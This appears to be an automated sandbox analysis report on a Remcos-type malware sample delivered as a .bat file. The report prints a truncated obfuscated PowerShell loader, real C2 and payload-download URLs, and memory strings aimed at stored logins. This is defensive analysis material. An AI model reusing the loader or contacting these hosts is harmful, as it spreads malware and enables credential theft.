El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgar
              Timestamp:05/31/24-08:09:37.861418
              SID:2032776
              Source Port:51547
              Destination Port:3050
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/31/24-08:09:38.586077
              SID:2032777
              Source Port:3050
              Destination Port:51547
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: http://194.59.30.6/UWYVFXQWh32.binAvira URL Cloud: Label: malware
              Source: http://194.59.30.6/Uncomic.mdpAvira URL Cloud: Label: malware
              Source: jgbours284hawara02.duckdns.orgVirustotal: Detection: 5%Perma Link
              Source: http://194.59.30.6/Uncomic.mdpVirustotal: Detection: 7%Perma Link
              Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batVirustotal: Detection: 14%Perma Link
              Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batReversingLabs: Detection: 13%
              Source: Yara matchFile source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,16_2_00404423
              Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51553 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51555 version: TLS 1.2
              Source: Binary string: lambda_methodCore.pdb5 source: powershell.exe, 00000006.00000002.2507983794.0000000008320000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000018.00000002.2966794524.00000000088BC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2508311915.000000000837F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: wab.exe
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT source: powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l@ source: powershell.exe, 00000006.00000002.2505588191.0000000007251000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_21CB10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB6580 FindFirstFileExA,11_2_21CB6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

              Software Vulnerabilities

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:51547 -> 178.215.236.110:3050
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 178.215.236.110:3050 -> 192.168.2.6:51547
              Source: unknownDNS query: name: jgbours284hawara02.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.6:51547 -> 178.215.236.110:3050
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 137.220.252.40 137.220.252.40
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: unknownTCP traffic detected without corresponding DNS query: 194.59.30.6
              Source: global trafficHTTP traffic detected: GET /Rutschebanes.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ramirex.roConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ramirex.roCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /Uncomic.mdp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 194.59.30.6Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /UWYVFXQWh32.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 194.59.30.6Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-P HTTP/1.1Host: www.387mfyr.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
              Source: wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2559663310.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000010.00000003.2559663310.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000B.00000002.3437548482.00000000225D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000B.00000002.3437548482.00000000225D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: 103.169.127.40.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: jgbours284hawara02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficDNS traffic detected: DNS query: ramirex.ro
              Source: global trafficDNS traffic detected: DNS query: www.387mfyr.sbs
              Source: global trafficDNS traffic detected: DNS query: www.led-svitidla.eu
              Source: unknownHTTP traffic detected: POST /abt9/ HTTP/1.1Host: www.led-svitidla.euAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.led-svitidla.euReferer: http://www.led-svitidla.eu/abt9/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 210User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 55 52 6c 30 54 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 31 43 37 49 78 67 6a 71 4c 71 35 48 50 4f 69 37 31 77 6c 6c 70 79 4c 74 36 34 35 70 42 4e 48 34 32 30 6b 6c 34 30 52 4e 33 72 50 Data Ascii: URl0T=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+1C7IxgjqLq5HPOi71wllpyLt645pBNH420kl40RN3rP
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 31 May 2024 06:10:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 31 May 2024 06:11:07 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 31 May 2024 06:11:12 GMTServer: ApacheX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A42CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2579735465.0000024A44318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6
              Source: wab.exe, 0000000B.00000002.3436368353.0000000021810000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/UWYVFXQWh32.bin
              Source: wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/UWYVFXQWh32.binB
              Source: wab.exe, 0000000B.00000002.3436368353.0000000021810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/UWYVFXQWh32.binHovesValramirex.ro/UWYVFXQWh32.bin
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A42AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/Uncomic.mdpP
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/Uncomic.mdpXR
              Source: powershell.exe, 00000003.00000002.2687473128.0000024A5ABB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
              Source: powershell.exe, 00000014.00000002.3389504984.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: wab.exe, 0000000B.00000002.3423060854.0000000006094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: powershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000014.00000002.3321380834.0000000004F63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramirex.ro
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
